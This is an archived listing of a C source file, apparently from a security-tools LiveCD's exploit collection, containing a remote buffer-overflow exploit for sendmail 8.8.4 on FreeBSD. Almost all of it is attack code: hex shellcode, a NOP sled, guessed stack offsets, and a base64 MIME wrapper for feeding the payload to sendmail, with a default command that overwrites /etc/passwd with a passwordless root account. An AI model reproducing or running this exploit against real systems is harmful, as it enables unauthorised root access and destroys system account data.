Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / sendmail / bsd-sm884.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 3.0 KB | 113 lines

/* sendmail 8.8.4, freebsd, mime 7to8, remote I checked this only at home, at custom installed 8.8.4. I have no freebsd with preinstaled 8.8.4 around. change cmd[] below to shell command you want, and throw output to sendmail */ #include <stdlib.h> #include <fcntl.h> #define BUFSIZE 6100 #define OFFS -5000 #define ALIGN 0 #define ADDRS 15 int get_sp(void) { /* __asm__(" movl %esp,%eax"); */ return 0xefbf95e4; } /* up to 220 bytes */ char cmd[]="echo 'h::0:0:/tmp:/bin/bash > /etc/passwd'"; char asmcode[]="\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89" "\x36\x89\x76\x04\x89\x76\x08\x83\x06\x10\x83\x46" "\x04\x18\x83\x46\x08\x1b\x89\x46\x0c\x88\x46\x17" "\x88\x46\x1a\x88\x46\x1d\x50\x56\xff\x36\xb0\x3b" "\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff" "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02" "\x02\x02\x02\x02\x02\x02\x2f\x62\x69\x6e\x2f\x73" "\x68\x2e\x2d\x63\x2e"; char nop[]="\x90"; char Base64Table[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; void run(unsigned char *buf) { unsigned int i, j, k; printf("MIME-Version: 1.0\n"); printf("Content-Type: text/plain\n"); printf("Content-Transfer-Encoding: base64\n"); k=strlen(buf) / 3 * 3; for (i=0; i < k; i+=3) { j=(buf[i] << 16) + (buf[i+1] << 8) + buf[i+2]; if (i % 54 == 0) printf("\n"); printf("%c", Base64Table[(j & 0xfc0000) >> 18]); printf("%c", Base64Table[(j & 0x03f000) >> 12]); printf("%c", Base64Table[(j & 0x000fc0) >> 6]); printf("%c", Base64Table[j & 0x00003f]); } switch (strlen(buf) - k) { case 1: printf("%c%c==", Base64Table[(buf[k] & 0xfc) >> 2], Base64Table[(buf[k] & 0x3) << 4]); break; case 2: printf("%c%c%c=", Base64Table[(buf[k] & 0xfc) >> 2], Base64Table[((buf[k] & 0x3) << 4)+((buf[k+1] & 0xf0) >> 4)], Base64Table[(buf[k+1] & 0xf) << 2]); break; default: } printf("\n"); } char code[sizeof(asmcode) + sizeof(cmd)]; main(int argc, char *argv[]) { char *buf, *ptr, addr[8]; int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS; int i, noplen=strlen(nop); if (argc >1) bufsize=atoi(argv[1]); if (argc >2) offs=atoi(argv[2]); if (argc >3) addrs=atoi(argv[3]); strcpy(code, asmcode); strncat(code, cmd); strncat(code, "."); code[41]=0x1a+strlen(cmd)+1; if (bufsize<strlen(code)) { printf("bufsize too small, code is %d bytes long\n", strlen(asmcode)); exit(1); } if ((buf=malloc(bufsize+ADDRS<<2+noplen+1))==NULL) { printf("Can't malloc\n"); exit(1); } *(int *)addr=get_sp()+offs; printf("address - %p\n", *(int *)addr); ptr=buf; for (i=0; i<bufsize; i++) *ptr++=nop[i % noplen]; memcpy(ptr-strlen(code), code, strlen(code)); for (i=0; i<addrs<<2; i++) *ptr++=addr[i % sizeof(int)]; *ptr=0; printf("total buf len - %d\n", strlen(buf)); run(buf); } /* www.hack.co.za [2000]*/